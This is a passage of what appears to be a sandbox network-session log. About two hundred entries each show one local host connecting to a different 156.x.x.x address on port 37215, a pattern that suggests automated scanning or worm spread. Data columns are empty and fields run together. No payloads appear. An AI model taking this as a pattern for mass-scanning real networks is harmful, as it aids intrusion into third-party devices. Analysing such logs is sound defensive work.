                                                                            19958192.168.2.1546282156.221.145.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19959192.168.2.1536410156.118.168.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19960192.168.2.1543696156.183.32.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19961192.168.2.1550468156.175.2.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19962192.168.2.1536992156.36.167.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19963192.168.2.1546366156.158.91.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19964192.168.2.1542688156.189.129.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19965192.168.2.1540056156.246.98.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19966192.168.2.1542918156.169.95.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19967192.168.2.1534244156.6.192.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19968192.168.2.1533328156.181.104.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19969192.168.2.1554138156.92.165.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19970192.168.2.1535858156.246.50.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19971192.168.2.1536416156.29.56.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19972192.168.2.1549422156.221.102.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19973192.168.2.1538146156.244.45.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19974192.168.2.1547934156.172.103.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19975192.168.2.1547048156.251.146.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19976192.168.2.1540272156.173.156.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19977192.168.2.1558360156.34.169.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19978192.168.2.1537960156.109.87.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19979192.168.2.1536752156.205.129.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19980192.168.2.1533516156.123.230.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19981192.168.2.1540834156.67.248.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19982192.168.2.1551184156.93.56.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19983192.168.2.1537334156.128.157.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19984192.168.2.1537628156.195.12.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19985192.168.2.1533648156.108.55.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19986192.168.2.1554418156.163.230.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19987192.168.2.1557356156.57.237.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19988192.168.2.1546636156.118.109.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19989192.168.2.1534766156.75.106.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19990192.168.2.1542602156.33.213.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19991192.168.2.1558418156.125.175.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19992192.168.2.1542262156.196.190.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19993192.168.2.1555370156.253.7.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19994192.168.2.1544336156.51.135.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19995192.168.2.1551112156.192.238.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19996192.168.2.1555266156.90.208.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19997192.168.2.1546974156.244.19.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19998192.168.2.1548988156.98.122.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19999192.168.2.1542620156.12.129.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20000192.168.2.1548652156.203.129.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20001192.168.2.1540330156.83.143.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20002192.168.2.1556976156.168.103.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20003192.168.2.1542260156.194.90.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20004192.168.2.1555750156.145.71.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20005192.168.2.1548112156.216.143.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20006192.168.2.1553634156.130.66.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20007192.168.2.1536890156.136.166.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20008192.168.2.1541178156.163.153.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20009192.168.2.1546638156.68.214.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20010192.168.2.1538596156.2.132.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20011192.168.2.1538318156.100.137.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20012192.168.2.1534398156.4.33.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20013192.168.2.1550298156.255.171.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20014192.168.2.1560412156.14.22.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20015192.168.2.1559146156.255.168.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20016192.168.2.1533442156.116.160.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20017192.168.2.1555110156.233.233.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20018192.168.2.1554958156.96.102.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20019192.168.2.1555900156.147.229.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20020192.168.2.1542718156.152.20.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20021192.168.2.1553682156.221.151.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20022192.168.2.1548788156.83.190.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20023192.168.2.1553274156.10.201.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20024192.168.2.1533270156.105.150.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20025192.168.2.1547698156.59.23.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20026192.168.2.1542860156.139.208.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20027192.168.2.1542288156.87.218.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20028192.168.2.1546626156.238.89.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20029192.168.2.1536862156.105.201.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20030192.168.2.1550540156.33.90.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20031192.168.2.1539806156.23.218.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20032192.168.2.1558318156.39.75.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20033192.168.2.1538124156.196.99.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20034192.168.2.1558488156.216.186.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20035192.168.2.1557850156.159.93.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20036192.168.2.1534934156.108.57.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20037192.168.2.1554048156.20.132.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20038192.168.2.1558142156.224.194.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20039192.168.2.1543654156.58.231.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20040192.168.2.1551894156.180.36.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20041192.168.2.1550316156.158.245.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20042192.168.2.1552278156.159.85.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20043192.168.2.1540704156.103.72.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20044192.168.2.1547894156.126.144.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20045192.168.2.1557906156.20.82.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20046192.168.2.1537080156.242.83.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20047192.168.2.1560570156.79.225.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20048192.168.2.1539790156.12.16.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20049192.168.2.1550646156.144.202.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20050192.168.2.1555738156.146.34.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20051192.168.2.1541052156.32.236.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20052192.168.2.1537550156.50.139.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20053192.168.2.1556534156.184.43.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20054192.168.2.1557940156.83.85.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20055192.168.2.1537658156.111.91.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20056192.168.2.1538172156.210.157.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20057192.168.2.1542400156.162.70.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20058192.168.2.1543938156.76.144.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20059192.168.2.1551860156.126.235.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20060192.168.2.1559322156.196.9.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20061192.168.2.1533538156.39.85.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20062192.168.2.1537494156.41.1.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20063192.168.2.1539604156.197.132.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20064192.168.2.1558754156.195.109.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20065192.168.2.1553096156.195.27.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20066192.168.2.1534736156.223.254.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20067192.168.2.1554842156.122.21.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20068192.168.2.1547284156.168.109.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20069192.168.2.1535690156.107.227.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20070192.168.2.1544828156.156.170.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20071192.168.2.1550752156.67.91.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20072192.168.2.1552110156.148.139.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20073192.168.2.1552526156.131.125.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20074192.168.2.1559754156.190.105.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20075192.168.2.1546814156.78.216.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20076192.168.2.1537164156.72.34.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20077192.168.2.1560078156.47.28.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20078192.168.2.1534994156.106.172.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20079192.168.2.1558638156.102.58.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20080192.168.2.1543424156.250.248.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20081192.168.2.1546614156.183.204.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20082192.168.2.1550768156.224.66.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20083192.168.2.1557256156.5.53.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20084192.168.2.1548940156.176.166.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20085192.168.2.1552800156.49.105.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20086192.168.2.1560162156.173.165.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20087192.168.2.1537108156.15.6.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20088192.168.2.1560100156.64.63.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20089192.168.2.1541968156.120.242.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20090192.168.2.1548992156.116.232.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20091192.168.2.1540288156.70.128.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20092192.168.2.1554246156.186.179.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20093192.168.2.1535260156.224.147.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20094192.168.2.1555182156.233.12.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20095192.168.2.1544580156.44.72.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20096192.168.2.1559998156.132.208.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20097192.168.2.1560912156.165.147.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20098192.168.2.1546270156.17.93.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20099192.168.2.1551424156.250.193.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20100192.168.2.1549476156.69.34.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20101192.168.2.1537850156.172.63.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20102192.168.2.1542934156.113.99.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20103192.168.2.1539660156.219.136.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20104192.168.2.1554026156.208.179.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20105192.168.2.1556130156.126.77.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20106192.168.2.1546188156.231.9.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20107192.168.2.1544882156.5.81.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20108192.168.2.1547242156.173.87.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20109192.168.2.1552914156.121.148.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20110192.168.2.1544822156.70.71.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20111192.168.2.1547054156.67.27.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20112192.168.2.1540128156.27.173.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20113192.168.2.1538756156.218.153.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20114192.168.2.1551104156.230.238.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20115192.168.2.1534856156.115.197.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20116192.168.2.1537730156.209.226.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20117192.168.2.1550356156.82.70.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20118192.168.2.1551140156.128.15.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20119192.168.2.1551180156.10.107.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20120192.168.2.1542946156.230.59.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20121192.168.2.1551406156.242.26.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20122192.168.2.1537588156.1.70.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20123192.168.2.1548544156.6.202.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20124192.168.2.1540938156.48.72.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20125192.168.2.1552946156.91.11.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20126192.168.2.1556758156.18.161.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20127192.168.2.1535848156.155.246.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20128192.168.2.1542244156.207.137.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20129192.168.2.1551312156.144.26.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20130192.168.2.1542802156.20.223.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20131192.168.2.1548710156.233.92.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20132192.168.2.1538808156.69.246.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20133192.168.2.1547668156.216.64.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20134192.168.2.1551176156.187.106.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20135192.168.2.1544426156.74.220.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20136192.168.2.1549036156.166.244.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20137192.168.2.1537072156.181.80.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20138192.168.2.1537348156.76.250.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20139192.168.2.1534284156.32.44.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20140192.168.2.1553746156.127.18.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20141192.168.2.1553174156.231.77.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20142192.168.2.1550344156.77.173.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20143192.168.2.1536396156.31.90.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20144192.168.2.1557876156.161.2.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20145192.168.2.1543514156.187.20.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20146192.168.2.1547470156.199.145.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20147192.168.2.1539608156.174.33.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20148192.168.2.1534078156.59.66.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20149192.168.2.1558768156.30.31.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20150192.168.2.1543954156.134.64.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20151192.168.2.1554464156.126.183.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20152192.168.2.1550580156.243.34.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20153192.168.2.1542234156.104.223.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20154192.168.2.1553688156.176.202.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20155192.168.2.1556830156.27.177.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20156192.168.2.1539456156.5.50.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20157192.168.2.1556478156.148.91.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
